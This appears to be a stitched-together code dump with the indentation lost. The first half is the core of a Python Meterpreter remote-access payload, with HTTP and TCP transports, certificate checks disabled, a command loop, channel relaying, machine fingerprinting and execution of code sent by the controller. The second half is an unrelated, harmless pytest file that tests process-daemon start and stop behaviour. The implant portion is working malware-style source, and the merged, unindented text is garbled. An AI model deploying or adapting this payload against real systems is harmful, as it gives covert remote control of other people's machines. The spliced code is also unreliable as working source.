def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 8:
packet = None # looks corrupt
break
pkt_length, _ = struct.unpack('>II', packet[:8])
if len(packet) != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet[8:]
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(8)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 8:
if first and len(packet) == 4:
received = 0
pkt_length = struct.unpack('>I', packet)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
pkt_length, pkt_type = struct.unpack('>II', packet)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return packet
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.interact_channels = []
self.processes = {}
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = 0
while idx in self.channels:
idx += 1
self.channels[idx] = channel
return idx
def add_process(self, process):
idx = 0
while idx in self.processes:
idx += 1
self.processes[idx] = process
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
test_daemon.py
|
# Copyright 2021-2022 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
#
import functools
import logging
import pprint
import re
import sys
import time
import attr
import psutil
import pytest
from pytestskipmarkers.utils import platform
from pytestshellutils.exceptions import FactoryNotRunning
from pytestshellutils.exceptions import FactoryNotStarted
from pytestshellutils.shell import Daemon
from pytestshellutils.utils.processes import _get_cmdline
from tests.conftest import Tempfiles
PROCESS_START_TIMEOUT = 2
log = logging.getLogger(__name__)
def kill_children(procs): # pragma: no cover
_, alive = psutil.wait_procs(procs, timeout=3)
for p in alive:
p.kill()
def test_daemon_process_termination(request, tempfiles: Tempfiles):
primary_childrend_count = 5
secondary_children_count = 3
script = tempfiles.makepyfile(
"""
#!{shebang}
# coding=utf-8
import time
import multiprocessing
def spin():
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def spin_children():
procs = []
for idx in range({secondary_children_count}):
proc = multiprocessing.Process(target=spin)
proc.daemon = True
proc.start()
procs.append(proc)
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def main():
procs = []
for idx in range({primary_childrend_count}):
proc = multiprocessing.Process(target=spin_children)
procs.append(proc)
proc.start()
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
# We're not terminating child processes on purpose. Our code should handle it.
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""".format(
shebang=sys.executable,
primary_childrend_count=primary_childrend_count,
secondary_children_count=secondary_children_count,
),
executable=True,
)
if not platform.is_windows():
factory_kwargs = dict(script_name=script)
else: # pragma: is-windows
        # Windows doesn't know how to handle Python scripts directly
factory_kwargs = dict(script_name=sys.executable, base_script_args=[script])
daemon = Daemon(start_timeout=1, **factory_kwargs)
daemon.start()
daemon_pid = daemon.pid
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
# Allow the script to start
time.sleep(PROCESS_START_TIMEOUT)
assert psutil.pid_exists(daemon_pid)
proc = psutil.Process(daemon_pid)
children = proc.children(recursive=True)
request.addfinalizer(functools.partial(kill_children, children))
child_count = len(children)
expected_count = primary_childrend_count + (primary_childrend_count * secondary_children_count)
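    # With the values above this is 5 + 5 * 3 == 20 children and grandchildren.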
if platform.is_windows() and sys.version_info >= (3, 7): # pragma: is-windows-ge-py37
# After Python 3.7 there's an extra spawning process
expected_count += 1
if platform.is_darwin() and sys.version_info >= (3, 8): # pragma: is-darwin-ge-py38
        # macOS defaults to spawning new processes after Python 3.8
# Account for the forking process
expected_count += 1
assert child_count == expected_count, "{}!={}\n{}".format(
child_count,
expected_count,
pprint.pformat([_get_cmdline(child) or child for child in children]),
)
daemon.terminate()
assert psutil.pid_exists(daemon_pid) is False
for child in list(children): # pragma: no cover
if psutil.pid_exists(child.pid):
continue
children.remove(child)
assert not children, "len(children)=={} != 0\n{}".format(
len(children), pprint.pformat([_get_cmdline(child) or child for child in children])
)
@pytest.mark.skip("Will debug later")
def test_daemon_process_termination_parent_killed(request, tempfiles: Tempfiles):
primary_childrend_count = 5
secondary_children_count = 3
script = tempfiles.makepyfile(
"""
#!{shebang}
# coding=utf-8
import time
import multiprocessing
def spin():
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def spin_children():
procs = []
for idx in range({secondary_children_count}):
proc = multiprocessing.Process(target=spin)
proc.daemon = True
proc.start()
procs.append(proc)
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def main():
procs = []
for idx in range({primary_childrend_count}):
proc = multiprocessing.Process(target=spin_children)
procs.append(proc)
proc.start()
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
# We're not terminating child processes on purpose. Our code should handle it.
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""".format(
shebang=sys.executable,
primary_childrend_count=primary_childrend_count,
secondary_children_count=secondary_children_count,
),
executable=True,
)
if not platform.is_windows():
factory_kwargs = dict(script_name=script)
else: # pragma: is-windows
        # Windows doesn't know how to handle Python scripts directly
factory_kwargs = dict(script_name=sys.executable, base_script_args=[script])
daemon = Daemon(start_timeout=1, **factory_kwargs)
daemon.start()
daemon_pid = daemon.pid
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
# Allow the script to start
time.sleep(PROCESS_START_TIMEOUT)
assert psutil.pid_exists(daemon_pid)
proc = psutil.Process(daemon_pid)
children = proc.children(recursive=True)
request.addfinalizer(functools.partial(kill_children, children))
assert len(children) == primary_childrend_count + (
primary_childrend_count * secondary_children_count
)
# Pretend the parent process died.
proc.kill()
time.sleep(0.5)
    # We should still be able to terminate all child processes
daemon.terminate()
assert psutil.pid_exists(daemon_pid) is False
psutil.wait_procs(children, timeout=3)
for child in list(children):
if psutil.pid_exists(child.pid):
continue
children.remove(child)
assert not children, "len(children)=={} != 0\n{}".format(
len(children), pprint.pformat(children)
)
@pytest.mark.parametrize("start_timeout", [0.1, 0.3])
def test_started_context_manager(request, tempfiles: Tempfiles, start_timeout: float):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(3)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with pytest.raises(FactoryNotStarted) as exc:
daemon.start(start_timeout=start_timeout)
match = re.search(r"which took (?P<seconds>.*) seconds", str(exc.value))
assert match
# XXX: Revisit logic
# seconds = float(match.group("seconds"))
# Must take at least start_timeout to start
# assert seconds > start_timeout
# Should not take more than start_timeout + 0.3 to start and fail
# assert seconds < start_timeout + 0.3
# And using a context manager?
with pytest.raises(FactoryNotStarted) as exc:
started = None
with daemon.started(start_timeout=start_timeout):
# We should not even be able to set the following variable
started = False # pragma: no cover
assert started is None
match = re.search(r"which took (?P<seconds>.*) seconds", str(exc.value))
assert match
# XXX: Revisit logic
# seconds = float(match.group("seconds"))
# Must take at least start_timeout to start
# assert seconds > start_timeout
# Should not take more than start_timeout + 0.3 to start and fail
# assert seconds < start_timeout + 0.3
@pytest.fixture
def factory_stopped_script(tempfiles):
return tempfiles.makepyfile(
r"""
# coding=utf-8
import os
import sys
import time
import socket
import multiprocessing
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 12345))
sock.listen(5)
try:
while True:
connection, address = sock.accept()
connection.close()
except (KeyboardInterrupt, SystemExit):
pass
finally:
sock.close()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
def test_stopped_context_manager_raises_FactoryNotRunning(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with pytest.raises(FactoryNotRunning):
with daemon.stopped():
pass # pragma: no cover
def test_stopped_context_manager(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with daemon.started():
assert daemon.is_running()
with daemon.stopped():
assert daemon.is_running() is False
assert daemon.is_running()
@attr.s
class DaemonCallbackCounter:
before_start_callback_counter = attr.ib(default=0) # type: int
after_start_callback_counter = attr.ib(default=0) # type: int
before_terminate_callback_counter = attr.ib(default=0) # type: int
after_terminate_callback_counter = attr.ib(default=0) # type: int
def before_start_callback(self):
self.before_start_callback_counter += 1
def after_start_callback(self):
self.after_start_callback_counter += 1
def before_terminate_callback(self):
self.before_terminate_callback_counter += 1
def after_terminate_callback(self):
self.after_terminate_callback_counter += 1
@attr.s
class DaemonContextCallbackCounter:
daemon = attr.ib() # type: Daemon
before_start_callback_counter = attr.ib(default=0) # type: int
after_start_callback_counter = attr.ib(default=0) # type: int
before_stop_callback_counter = attr.ib(default=0) # type: int
after_stop_callback_counter = attr.ib(default=0) # type: int
def before_start_callback(self, daemon):
assert daemon is self.daemon
self.before_start_callback_counter += 1
def after_start_callback(self, daemon):
assert daemon is self.daemon
self.after_start_callback_counter += 1
def before_stop_callback(self, daemon):
assert daemon is self.daemon
self.before_stop_callback_counter += 1
def after_stop_callback(self, daemon):
assert daemon is self.daemon
self.after_stop_callback_counter += 1
def test_daemon_callbacks(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
callbacks = DaemonCallbackCounter()
daemon.before_start(callbacks.before_start_callback)
daemon.after_start(callbacks.after_start_callback)
daemon.before_terminate(callbacks.before_terminate_callback)
daemon.after_terminate(callbacks.after_terminate_callback)
stopped_callbacks = DaemonContextCallbackCounter(daemon)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
daemon_started_once = False
with daemon.started():
daemon_started_once = daemon.is_running()
assert daemon_started_once is True
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 1
assert callbacks.after_start_callback_counter == 1
assert callbacks.before_terminate_callback_counter == 0
assert callbacks.after_terminate_callback_counter == 0
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 0
assert stopped_callbacks.after_stop_callback_counter == 0
assert stopped_callbacks.before_start_callback_counter == 0
assert stopped_callbacks.after_start_callback_counter == 0
with daemon.stopped(
before_stop_callback=stopped_callbacks.before_stop_callback,
after_stop_callback=stopped_callbacks.after_stop_callback,
before_start_callback=stopped_callbacks.before_start_callback,
after_start_callback=stopped_callbacks.after_start_callback,
):
assert daemon.is_running() is False
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 0
assert stopped_callbacks.after_start_callback_counter == 0
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 1
assert callbacks.after_start_callback_counter == 1
assert callbacks.before_terminate_callback_counter == 1
assert callbacks.after_terminate_callback_counter == 1
assert daemon.is_running()
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 1
assert stopped_callbacks.after_start_callback_counter == 1
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 2
assert callbacks.after_start_callback_counter == 2
assert callbacks.before_terminate_callback_counter == 1
assert callbacks.after_terminate_callback_counter == 1
# Let's go through stopped again; the stopped_callbacks should not be called again
# because they are not passed into .stopped()
with daemon.stopped():
assert daemon.is_running() is False
